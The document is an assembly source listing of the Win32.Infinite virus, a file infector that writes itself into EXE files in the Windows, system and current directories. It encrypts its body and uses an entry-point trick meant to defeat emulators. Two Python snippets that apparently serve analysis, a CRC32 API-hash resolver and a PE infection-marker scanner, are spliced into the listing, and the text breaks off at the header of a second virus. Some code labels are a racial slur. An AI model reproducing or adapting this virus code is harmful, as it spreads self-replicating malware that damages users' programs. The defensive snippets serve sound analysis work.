; [ Infinity - The song ]
;
; Mother watch your children
; The iron fist of fear is ruling our lives
; It's not too late to change the course
; We can make this world a better place to be in
;
; How much more do we want until we're satisfied?
; What happens when we have what we want?
; Acquiring more, still there's never enough
; We forget those who really are in need
; The end is near, or so they say
; Selling peace with guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; Guns spitting (out the) message of peace everywhere
; Is it really that we don't care?
; See mercenaries of fear selling love
; Telling salvation comes from above
; Arrogance and fear walking hand in hand
; We must see that there's much more to life than this
;
; Mother see your children
; Make us understand to and help us to find the way
; The answers lie inside
; They are locked inside to the vault of truth of us
; It's time to spread the word around
; Be yourself and do what you want to do with your life
; Remember, you get just what you give
; You reap all what you sow
; You are in charge of your own life
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; You make your own way
;
; ------------------------------------------
; Infinity - [ Stratovarius ] - ( Infinite )
;
; (c) 2000 Billy Belcebu/iKX [ http://beautifulpeople.cjb.net ]

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                Win32.Infinite (c) 2000 Billy Belcebu/iKX                ║
; ╚═════════════════════════════════════════════════════════════════════════╝

include host.inc ; Some nice includes
include infinite.inc

virseg segment dword use32 public 'infinite'

virus_start:

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                               Virus code                                ║
; ╚═════════════════════════════════════════════════════════════════════════╝

infinite:
push eax ; Make some space on stack
pushad
call decrypt

encrypt_start = $
call get_delta

call SetSEH ; Set our new protection frame
mov esp,[esp+08h]
call get_delta
jmp RestoreSEH
SetSEH:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp

push 05h ; ECX is the limit of pages
pop ecx
mov esi,ebp ; We put a page inside our code
call CheckImageBase ; Get our own image base
mov dword ptr [ebp+modbase-delta],esi

push 05h ; 50 pages to scan
pop ecx
mov esi,[esp+2Ch] ; Put the candidate to kernel
call CheckImageBase ; Scan backwards for it
mov dword ptr [ebp+kernel-delta],esi

lea eax,[ebp+api_list-delta] ; Let's detect all the needed
xchg eax,esi ; APIs :)
lea edi,[ebp+api_addresses-delta]
call GetAPIs

; Virus is now initialized, let's search for objectives.

lea edi,[ebp+current_dir-delta] ; Save current directory to
push edi ; a temp variable
push 7Fh
apicall GetCurrentDirectoryA

lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetWindowsDirectoryA
call SetDir&Infect

lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetSystemDirectoryA
call SetDir&Infect

lea edi,[ebp+current_dir-delta]
push edi
apicall SetCurrentDirectoryA
call Seek&Infect

; Now let's unprotect the memory where the epo bytes will be restored

call hh&l ; Hunting high & low :)
dq ?
hh&l: push 04h ; PAGE_READWRITE
push epo_bytes
mov eax,dword ptr [ebp+rethost-delta]
add eax,dword ptr [ebp+modbase-delta]
push eax
apicall VirtualProtect

; Now it's time to go away ;)

RestoreSEH:
xor edx,edx ; Restore the original SEH
pop dword ptr fs:[edx]
pop edx

mov edi,(offset host-400000h)
rethost equ $-4
add edi,12345678h
modbase equ $-4
mov [esp.20h],edi

call over0
sebes db epo_bytes dup (90h)
over0: pop esi
push epo_bytes
pop ecx
rep movsb

popad
ret

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                            Mark of the virus                            ║
; ╚═════════════════════════════════════════════════════════════════════════╝

db 0,"Win32.Infinite (c) 2000 Billy Belcebu/iKX",0

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                       Search for files to infect                        ║
; ╚═════════════════════════════════════════════════════════════════════════╝

SetDir&Infect:
lea edi,dword ptr [ebp+infect_dir-delta]
push edi
apicall SetCurrentDirectoryA

Seek&Infect:
lea eax,[ebp+WFD-delta] ; Search for files
push eax
call over3
db "*.*",0 ; Search for all files
over3: apicall FindFirstFileA

mov dword ptr [ebp+SearchHandle-delta],eax

inc eax
jz FailOccured

SearchForMore:
push dword ptr [ebp+modbase-delta] ; Preserve untouchable info
push dword ptr [ebp+rethost-delta]

lea edi,[(ebp.WFD.szFileName)-delta]; Is the file found factible
push edi ; of being infected?
call ProcessExtension
pop edi
jecxz NotThisTime ; Nopes.

call InfectPE

NotThisTime:
pop dword ptr [ebp+rethost-delta] ; Restore this interesting
pop dword ptr [ebp+modbase-delta] ; info

lea edi,[(ebp.WFD.szFileName)-delta]; Fill this with zeroes
mov ecx,260
xor al,al
rep stosb

lea eax,[ebp.WFD-delta] ; Search for more little
push eax ; suckers
push dword ptr [ebp+SearchHandle-delta]
apicall FindNextFileA
or eax,eax
jnz SearchForMore

CloseSearchHandle:
push dword ptr [ebp+SearchHandle-delta]
apicall FindClose
FailOccured:
ret

ProcessExtension:
; input:
; EDI - Pointer to file name
; output:
; ECX - NULL if it is not an extension; 1 if it is.

xor al,al ; Search for NULL
scasb
jnz $-1

lea esi,[edi-5] ; Get the extension :)
push 05h ; Size to calculate CRC32
pop edi
or dword ptr [esi],20202020h ; Make locase the lewsers
call CRC32

cmp eax,0F643C743h ; Only EXE files
jz ItWasExtension

dec edx
ItWasExtension:
inc edx
mov ecx,edx
ret

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                           PE Infection Engine                           ║
; ╚═════════════════════════════════════════════════════════════════════════╝

InfectPE:
; input:
; EDI - Pointer to filename to infect
; output:
; Nothing.

cmp dword ptr [ebp+SfcIsFileProtected-delta],00h
jz NotInWin2k

push edi ; Win2k ability: it has feature
push 00h ; that warns the user if an
apicall SfcIsFileProtected ; important file is being
; modified. If the file has
or eax,eax ; such protection, we won't
jnz ExitInfectPE ; touch it, ok? ;)

NotInWin2k:
push 80h ; Destroy hostile attributes
push edi ; and put normal ones
apicall SetFileAttributesA

xor eax,eax ; Open file for R/W
push eax
push eax
push 03h ; OPEN_EXISTING flag
push eax
inc eax
push eax
push 0C0000000h ; READ / WRITE
push edi
apicall CreateFileA

inc eax
jz ExitInfectPE
dec eax

mov dword ptr [ebp+FileHandle-delta],eax ; Save handle of opened file
push eax

push 00h
push eax
apicall GetFileSize ; Get its size
mov dword ptr [ebp+OriginalSize-delta],eax

pop ecx ; ECX = Handle

xor ebx,ebx ; EBX = 0
push ebx
push 00h ; push size
push ebx
push 04h
push ebx
push ecx ; push handle
apicall CreateFileMappingA

or eax,eax
jz CloseFileExitInfectPE

mov dword ptr [ebp+MapHandle-delta],eax

xor ebx,ebx
push 00h ; We want map only file size
push ebx
push ebx
push 02h
push eax
apicall MapViewOfFile

or eax,eax
jz UnMap&CloseMap&FileExitInfectPE

mov dword ptr [ebp+MapAddress-delta],eax

mov esi,[eax+3Ch] ; Ptr to PE header =]
add esi,eax
mov dword ptr [ebp+PtrPEH-delta],esi

cmp word ptr [esi],"EP" ; Check for PE mark
jnz Trunc&UnMap&CloseMap&FileExitInfectPE

cmp dword ptr [esi.MagicInfection],inf_mark
jz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for previous infection

cmp word ptr [esi.Machine],014Ch
jnz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for i386 ;)
cmp dword ptr [ebp.WFD.nFileSizeHigh-delta],00h
jne Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow huge & ugly files

cmp dword ptr [ebp.WFD.nFileSizeLow-delta],4000h
jb Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow too little files

mov eax,[esi.EntrypointRVA] ; EAX = Old file's EIP
mov dword ptr [ebp+rethost-delta],eax

mov edi,esi
add esi,0F8h-28h ; Pointer to 1st section-28h
nigger: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi.VirtualAddress] ; Remove the VirtualAddress
cmp edx,[esi.VirtualSize] ; Is EIP pointing to this sec?
jae nigger ; If not, loop again

mov ebx,dword ptr [ebp+MapAddress-delta]

pushad
push dword ptr [esi.SizeOfRawData] ; Some tricky thing :)
pop dword ptr [esi.VirtualSize]
mov eax,[ebp+rethost-delta]
add eax,ebx
mov dword ptr [ebp+tempshit-delta],eax
popad

add ebx,[esi.PtrToRawData]
add edx,ebx
mov esi,edx ; ESI - Pointer to section
mov dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.

mov ebx,dword ptr [ebp+OriginalSize-delta] ; Search limit
mov ecx,heap_end-virus_start+security ; How many space do we need
call SeekForHoles
jc ThereWasNoHole

pushad
sub eax,dword ptr [ebp+MapAddress-delta]
mov esi,dword ptr [ebp+PtrPEH-delta]
mov edi,esi ; We wanna put some attribs
add esi,0F8h-28h ; to the section where the
niggr2: add esi,28h ; virus code is located, so
mov edx,eax ; we've to search for it :)
sub edx,[esi.VirtualAddress]
cmp edx,[esi.VirtualSize]
jae niggr2

; EAX = Ptr to hole

mov dword ptr [ebp+inf_switch-delta],00h

; Let's check if we can put ourselves inside the hole (more security)

mov edx,[esi.VirtualAddress]
add edx,[esi.VirtualSize]
add eax,((heap_end-virus_start)+security)
sub edx,eax
js wecantinfectthere
mov dword ptr [ebp+inf_switch-delta],01h
or [esi.Characteristics],0A0000020h ; PUT IT SUCKA!
wecantinfectthere:
popad
mov ecx,12345678h
org $-4
inf_switch dd ?
or ecx,ecx
jz Trunc&UnMap&CloseMap&FileExitInfectPE

lea esi,[ebp+virus_start-delta]
mov edi,eax
add edi,security ; Some security :)

pushad
mov eax,12345678h ; Let's calculate where the
tempshit = $-4 ; jmp must point to
add eax,(killemu-epo)
sub edi,eax
mov dword ptr [ebp+jmpadd-delta],edi
popad

mov ecx,virus_size
rep movsb

; Encrypt with a silly l00p

pushad
sub edi,virus_end-encrypt_start
mov esi,edi
call random
mov bl,al
mov byte ptr [edi+enc_key-encrypt_start],bl
mov byte ptr [ebp+enc_k3y-delta],bl
mov ecx,encrypt_end-encrypt_start
enc_l00p:
lodsb
xor al,bl
stosb
loop enc_l00p
popad

pushad
sub edi,(virus_size-(sebes-virus_start))
mov esi,dword ptr [ebp+EPofs-delta]
push epo_bytes
pop ecx
pushad

lewpit:
lodsb ; Store EPO bytes also
xor al,00h ; encrypted
enc_k3y = $-1
stosb
loop lewpit

popad
xchg edi,esi

call over69

;──────────────────────────────────┐
epo: call killemu ;│ This code will give the control to the
mov esp,[esp+08h] ;│ virus and avoid the scanning of emulators
xor edx,edx ;│ at the same time :)
pop dword ptr fs:[edx];│
pop edx ;│
db 0E9h ;│
jmpadd: dd ? ;│
killemu:xor edx,edx ;│
push dword ptr fs:[edx];│
mov fs:[edx],esp ;│
div edx ;│
epo_bytes = $-epo ;│
;──────────────────────────────────┘

over69: pop esi

rep movsb
popad

mov esi,dword ptr [ebp+PtrPEH-delta]


mov dword ptr [esi.MagicInfection],inf_mark ; Put inf. mark

; Fix checksum if needed

add esi,58h
cmp dword ptr [esi],00h
jz Trunc&UnMap&CloseMap&FileExitInfectPE

push esi ; Pointer to CheckSum field


call n4t4s
dd ? ; Where store old CheckSum
n4t4s: push dword ptr [ebp+OriginalSize-delta]
push dword ptr [ebp+MapAddress-delta]
apicall CheckSumMappedFile

ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapAddress-delta]
apicall UnmapViewOfFile

CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapHandle-delta]
apicall CloseHandle

CloseFileExitInfectPE:
push dword ptr [ebp+FileHandle-delta]
apicall CloseHandle

ExitInfectPE:
ret

SeekForHoles:
; input:
; ESI - Pointer inside file (in PE header)
; ECX - How many space do we need
; EBX - Search limit
; output:
; EAX - Pointer to the beginning of the shit
; CF - Set if error (couldn't find hole)

call SetSEH1
mov esp,[esp+08h] ; Just for security of
call get_delta ; scanning :)
jmp NSE_
SetSEH1:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp

push esi
GetAnotherByte:
xor edx,edx ; Clear counter :)
GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)
lodsb
or al,al ; NULL byte?
jz IsFillByte
cmp al,0CCh ; Int 3? (VC6 filez're full
jnz GetAnotherByte ; of them)
IsFillByte:
inc edx ; Increase counter
cmp ecx,edx
jnz GAB2
WeFoundManyShit:
sub esi,ecx ; ESI = Point to shit
xchg eax,esi
pop esi
pop dword ptr fs:[00h]
pop edx
ret
NoShitEnough:
pop esi
NSE_: stc
pop dword ptr fs:[00h]
pop edx
ret

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║ APICRC32 Search Engine ║
; ╚═════════════════════════════════════════════════════════════════════════╝

GetAPIs proc
; input:
; EAX - Base address of the library where search the APIs
; ESI - Pointer to an array of CRC32 of the APIs we want to search
; EDI - Pointer to where store the APIs
; output:
; Nothing.

push eax ; EAX = Handle of module


pop dword ptr [ebp+TmpModuleBase-delta]
APIS33K:
lodsd ; Get in EAX the CRC32 of API
push esi edi
call GetAPI_ET_CRC32
pop edi esi
stosd ; Save in [EDI] the API address

cmp byte ptr [esi],0BBh ; There are more APIs in this


jnz APIS33K ; library

inc esi ; Check if it's the last of


cmp byte ptr [esi],"DC4" ; all them
jz EndOfAPISearch

push esi ; ESI points now to the ASCIIz


apicall LoadLibraryA ; string of a library... We
; need to load it!
push eax
nxtchr: lodsb ; Reach the end of the lib
test al,al ; asciiz name
jnz nxtchr

pop eax
jmp GetAPIs

EndOfAPISearch:
ret
GetAPIs endp

GetAPI_ET_CRC32 proc
; input:
; EAX - CRC32 of the API we want to know its address
; output:
; EAX - API address, NULL if error

xor edx,edx

pushad

call over_APICRC32_SEH
mov esp,[esp+08h] ; Set stack as before
xor eax,eax ; signalize the error
jmp Remove_APICRC32_SEH

over_APICRC32_SEH:
push dword ptr fs:[edx] ; Set new SEH frame
mov dword ptr fs:[edx],esp

xchg eax,edx ; Put CRC32 of da api in EDX


mov dword ptr [ebp+Counter-delta],eax ; Clear this field :)
push 3Ch
pop esi
add esi,[ebp+TmpModuleBase-delta] ; Get PE header of module
lodsw
add eax,[ebp+TmpModuleBase-delta] ; Normalize

push 1Ch
pop esi
add esi,[eax+78h] ; Get a pointer to its edata
add esi,[ebp+TmpModuleBase-delta]

lea edi,[ebp+AddressTableVA-delta] ; Pointer to the address table


lodsd ; Get AddressTable value
add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; And store in its variable

lodsd ; Get NameTable value


add eax,[ebp+TmpModuleBase-delta] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable

lodsd ; Get OrdinalTable value


add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; Store

pop esi ; ESI = NameTable VA

@?_3: lodsd ; Get pointer to an API name


push esi ; Save again
add eax,[ebp+TmpModuleBase-delta] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX

push edi ; Save EDI


xor al,al
scasb
jnz $-1
pop esi ; ESI = Pointer to API Name

sub edi,ebx ; EDI = API Name size

push edx ; Save API's CRC32


call CRC32 ; Get actual api's CRC32
pop edx ; Restore API's CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it

pop esi ; Restore ptr to api name


inc dword ptr [ebp+Counter-delta] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
mov eax,12345678h ; Put in EAX the number that
Counter = $-4 ; the API occupy in list.
shl eax,1 ; *2 (it's an array of words)
add eax,[ebp+OrdinalTableVA-delta] ; Normalize
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
cwde ; Clear MSW of EAX
shl eax,2 ; And with it we go to the
add eax,[ebp+AddressTableVA-delta] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+TmpModuleBase-delta] ; and normalize!! That's it!

Remove_APICRC32_SEH:
xor edx,edx ; Remove that SEH frame
pop dword ptr fs:[edx]
pop edx
mov [esp.1Ch],eax
popad
ret
GetAPI_ET_CRC32 endp

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║ Subroutines ║
; ╚═════════════════════════════════════════════════════════════════════════╝

CRC32:
; input:
; ESI - Pointer to the data to process
; EDI - Size of such data
; output:
; EAX - CRC32 of that data

cld
pushad
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
xchg eax,edx
rol eax,10h
mov ax,cx
mov [esp.PUSHAD_EAX],eax
popad
ret

CheckImageBase:
; input:
; ESI - Address inside module
; ECX - Limit
; output:
; ESI - module address

and esi,0FFFF0000h
cmp word ptr [esi],"ZM"
jz ItWasKewlEnough
NotCoolAddress:
sub esi,00010000h
loop CheckImageBase
ItWasKewlEnough:
ret

random:
; input:
; Nothing.
; output:
; EAX - Random number

apicall GetTickCount
xor eax,12345678h
org $-4
seed dd -1
mov dword ptr [ebp+seed-delta],eax
ret

; Let's save some bytes ;)

get_delta:
call delta ; Get a relative address from
delta: pop ebp ; when calculate offsets
ret
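The APICRC32 search engine above resolves imports by comparing the CRC32 of every export name against a table of precomputed hashes; the analyst-side inverse is to hash candidate export names and look the table's constants back up. The following is an added example, not code from the Win32.Infinite source; it re-implements the CRC32 routine bit by bit (same 0EDB88320h polynomial, -1 initial value and final NOT), and the candidate export list and the hypothetical lookup helpers are constructed here.

```python
"""CRC32 API-hash resolver: the analyst-side counterpart of GetAPI_ET_CRC32.

Added example, not part of the Win32.Infinite listing. The candidate name
list below is constructed by hand; in practice it would be the export table
of the DLL the sample loads (kernel32, imagehlp, sfc, ...).
"""
import zlib
from typing import Dict, Iterable, List, Optional

# Reflected CRC-32 polynomial; the listing keeps it as two 16-bit halves,
# 0EDB8h (xor bx) and 08320h (xor ax).
POLY = 0xEDB88320


def crc32_bitwise(data: bytes) -> int:
    """Bit-serial CRC-32: init 0FFFFFFFFh, shift right, final complement.

    Mirrors the listing's loop: ECX:EDX start at -1, each byte is XORed
    into the low byte, eight shift/xor rounds follow, NOT is applied last.
    """
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ POLY
            else:
                crc >>= 1
    return crc ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Sanity check: the hand-rolled routine agrees with the standard CRC-32."""
    return crc32_bitwise(data) == (zlib.crc32(data) & 0xFFFFFFFF)


def build_hash_index(export_names: Iterable[str]) -> Dict[int, str]:
    """Hash every candidate export name once (hypothetical helper)."""
    return {crc32_bitwise(name.encode("ascii")): name for name in export_names}


def resolve_hash_table(hashes: Iterable[int],
                       index: Dict[int, str]) -> List[Optional[str]]:
    """Turn a table of hashed imports back into names (None = no candidate)."""
    return [index.get(h & 0xFFFFFFFF) for h in hashes]


# Constructed candidate list: a handful of real kernel32/imagehlp export names.
CANDIDATE_EXPORTS = [
    "CreateFileA", "CloseHandle", "FindFirstFileA", "FindNextFileA",
    "LoadLibraryA", "GetProcAddress", "GetTickCount", "MapViewOfFile",
    "UnmapViewOfFile", "CheckSumMappedFile", "Sleep", "ExitProcess",
]

# Constants copied from the api_list table further down in the listing.
LISTING_API_LIST = [0x8C892DDF, 0x68624A9D, 0x4134D1AD, 0xFFC97C1F, 0x613FD7BA]


if __name__ == "__main__":
    index = build_hash_index(CANDIDATE_EXPORTS)
    for h, name in zip(LISTING_API_LIST,
                       resolve_hash_table(LISTING_API_LIST, index)):
        print(f"{h:08X} -> {name}")
```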
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║ Virus Data ║
; ╚═════════════════════════════════════════════════════════════════════════╝

api_list = $
; db "KERNEL32",0 ; Don't needed
@VirtualProtect dd 079C3D4BBh
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetFileSize dd 0EF7D811Bh
@SetFilePointer dd 085859D42h
@GetSystemTime dd 075B7EBE8h
@LoadLibraryA dd 04134D1ADh
@FreeLibrary dd 0AFDF191Fh
@GlobalAlloc dd 083A353C3h
@GlobalFree dd 05CDF6B6Ah
@WriteFile dd 021777793h
@GetProcAddress dd 0FFC97C1Fh
@GetTickCount dd 0613FD7BAh
db 0BBh

db "IMAGEHLP",0
@CheckSumMappedFile dd 078B31744h
db 0BBh

db "SFC",0
@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh

; That's the end, my friend...

db "DC4"

encrypt_end = $

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║ Simple decryption l00p :) ║
; ╚═════════════════════════════════════════════════════════════════════════╝

decrypt:
pop esi
mov edi,esi
mov ecx,encrypt_end-encrypt_start
mov bl,00h
enc_key = $-1
dec_l00p:
lodsb
xor al,bl
stosb
loop dec_l00p
jmp encrypt_start
virus_end = $

; ╔═════════════════════════════════════════════════════════════════════════╗
; ║ Virus Data in the heap ║
; ╚═════════════════════════════════════════════════════════════════════════╝

kernel dd ?
TmpModuleBase dd ?
AddressTableVA dd ?
NameTableVA dd ?
OrdinalTableVA dd ?
OriginalSize dd ?
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
PtrPEH dd ?
EPofs dd ?

api_addresses = $

; KERNEL32 APIs

VirtualProtect dd ?
FindFirstFileA dd ?
FindNextFileA dd ?
FindClose dd ?
CreateFileA dd ?
SetFileAttributesA dd ?
CloseHandle dd ?
GetCurrentDirectoryA dd ?
SetCurrentDirectoryA dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetEndOfFile dd ?
GetFileSize dd ?
SetFilePointer dd ?
GetSystemTime dd ?
LoadLibraryA dd ?
FreeLibrary dd ?
GlobalAlloc dd ?
GlobalFree dd ?
WriteFile dd ?
GetProcAddress dd ?
GetTickCount dd ?

; IMAGEHLP APIs

CheckSumMappedFile dd ?

; SFC APIs

SfcIsFileProtected dd ?

; Other datas

WFD WIN32_FIND_DATA <?>


infect_dir db 7Fh dup (?)
current_dir db 7Fh dup (?)
heap_end = $

virseg ends

end infinite

;------------------------------[ INFINITE.INC ]------------------------------;

;****************************************************************************
;** This is the include file for the constants and macros of the virus **
;****************************************************************************

; Constants

virus_size = virus_end-virus_start
total_size = heap_end-virus_start
inf_mark = "AIAG"

security = 20d ; Very important

PUSHAD_EDI = 00h
PUSHAD_ESI = 04h
PUSHAD_EBP = 08h
PUSHAD_ESP = 0Ch
PUSHAD_EBX = 10h
PUSHAD_EDX = 14h
PUSHAD_ECX = 18h
PUSHAD_EAX = 1Ch

; Some PE header stuff

MagicPE = 00h
Machine = 04h
NumberOfSections= 06h
EntrypointRVA = 28h
CodeRVA = 2Ch
FileAlignment = 3Ch
MagicInfection = 4Ch
SizeOfImage = 50h
CheckSum = 58h
PECharacteristics= 5Eh
DirEntryReloc = 0A0h

; Some section header fields

SectionName = 00h
VirtualSize = 08h
VirtualAddress = 0Ch
SizeOfRawData = 10h
PtrToRawData = 14h
PtrToReloc = 18h
NumOfReloc = 20h
Characteristics = 24h

; Macros

apicall macro api2call


call dword ptr [ebp+api2call-delta]
endm

; Structures
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
szFileName db 260 dup (?)
szAlternateFileName db 13 dup (?)
db 03 dup (?)
WIN32_FIND_DATA ends

;-------------------------------[ HOST.INC ]--------------------------------;

;****************************************************************************
;** This is the host for the first generation **
;****************************************************************************

.586p
.model flat,stdcall

extrn MessageBoxA:PROC
extrn ExitProcess:PROC

_DATA segment dword use32 public 'DATA'

szTtl db "Win32.Infinite",0
szMsg db "Size "
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " - "
db "Virtual "
db total_size/1000 mod 10 + "0"
db total_size/0100 mod 10 + "0"
db total_size/0010 mod 10 + "0"
db total_size/0001 mod 10 + "0"
db 10,"(c) 2000 Billy Belcebu/iKX",0

_DATA ends

_TEXT segment dword use32 public 'CODE'

virus_init proc
jmp virus_start
host:
db epo_bytes dup (90h)
call MessageBoxA,0,offset szMsg,offset szTtl,0
call ExitProcess,0
virus_init endp

_TEXT ends
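Both viruses on this page reuse the same reserved dword of the PE optional header as an infection marker (MagicInfection = 4Ch in INFINITE.INC, the Win32VersionValue field, normally zero): Win32.Infinite writes inf_mark "AIAG", and the W9x.mATRiX listing below compares [esi+4ch] with 0badc0deh. The following is an added example, not code from either listing: a Python scanner that reads that field and also lists sections flagged both writable and executable, the attribute Infinite ORs into the section holding its body (0A0000020h); the sample images are constructed in build_sample_pe() and are not runnable programs.

```python
"""Scan a PE image for the infection marker at PE+4Ch and for W+X sections.

Added example, not code from either virus listing. Marks are compared as
little-endian dword values, so TASM's "AIAG" (bytes "GAIA" on disk) is
handled without byte-order guesswork.
"""
import struct
from typing import Dict, List, Optional

INFINITE_MARK = 0x41494147     # TASM "AIAG" as a dword (inf_mark in INFINITE.INC)
MATRIX_MARK = 0x0BADC0DE       # dword W9x.mATRiX compares at [PE+4Ch]
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PE_HEADER_MIN = 0x5C           # enough to reach the CheckSum field at 58h


def scan_pe(data: bytes) -> Optional[Dict[str, object]]:
    """Return findings for one PE image, or None if it is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe, = struct.unpack_from("<I", data, 0x3C)
    if pe + PE_HEADER_MIN > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    nsec, = struct.unpack_from("<H", data, pe + 6)
    opt_size, = struct.unpack_from("<H", data, pe + 20)
    mark, = struct.unpack_from("<I", data, pe + 0x4C)   # Win32VersionValue

    # Sections that are both writable and executable: Infinite ORs
    # 0A0000020h into the section holding its body; mATRiX sets
    # sectionflags (00000020h or 80000000h or 20000000h) on the last section.
    writable_code: List[str] = []
    sec = pe + 24 + opt_size
    for i in range(nsec):
        off = sec + i * 40
        if off + 40 > len(data):
            break
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars, = struct.unpack_from("<I", data, off + 36)
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            writable_code.append(name)

    return {
        "mark": mark,
        "reserved_field_nonzero": mark != 0,
        "infinite_mark": mark == INFINITE_MARK,
        "matrix_mark": mark == MATRIX_MARK,
        "writable_code_sections": writable_code,
    }


def build_sample_pe(mark: int, section_chars: int) -> bytes:
    """Constructed minimal PE32 image with one section, for testing the scanner."""
    pe_off = 0x40
    img = bytearray(b"MZ" + b"\0" * (0x3C - 2)) + struct.pack("<I", pe_off)
    img += b"PE\0\0"
    # COFF header: i386, 1 section, no symbols, 0E0h optional header, EXE flags
    img += struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)      # AddressOfEntryPoint (PE+28h)
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase (PE+34h)
    struct.pack_into("<I", opt, 36, 0x200)       # FileAlignment (PE+3Ch)
    struct.pack_into("<I", opt, 52, mark)        # Win32VersionValue (PE+4Ch)
    img += opt
    img += b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, section_chars)
    return bytes(img)


if __name__ == "__main__":
    samples = (("clean", 0, 0x60000020),
               ("Infinite-marked", INFINITE_MARK, 0x60000020 | 0xA0000020),
               ("mATRiX-marked", MATRIX_MARK, 0xE0000020))
    for label, mark, chars in samples:
        print(label, scan_pe(build_sample_pe(mark, chars)))
```

A non-zero Win32VersionValue on its own is only a weak anomaly; the two exact values are what tie a file to these families.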
;comment ÿ
;
;released
;
;· ─═─════─════════════════════─·─════════════════════════════════════─═══─═─ ·
; ▄▄▄▄▄ ░
; ████ ░ ▀▀▀▀ ████▀███ ████▀████ ████ ████■▀▀▀▀ ████▀████ ████▀████2000
; ░ ▓███ ░ ████ ▓███▄ ░ ████■ ████ ░ ▓███ ████ ████ ░ ▓███■ ░
;░░░░▓███░████░▓███░████░░░░░████░████░▓███░█░████░▓███░▓███░░░░░░▓███░████░ ░░
; ░ ▓███▄████▄▓███ ▓███ ░ ▓███▄████ ▓███▄█▄████ ▓▓██▄▓███ ░ ░▓███▄████[LW]
; ▀▀▀▀▀▀▀ ░
; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
;
;
; Intro
;
; This virus is my first Windows virus, and the result of reading some
; docs, tutorials and (Ring0 virus) sources.
;
; It is not a very complicated virus, and it doesn't use new techniques
; either... Maybe the ASCII counter is some unusual feature.
;
; When debugging is enabled, these things are extra:
;
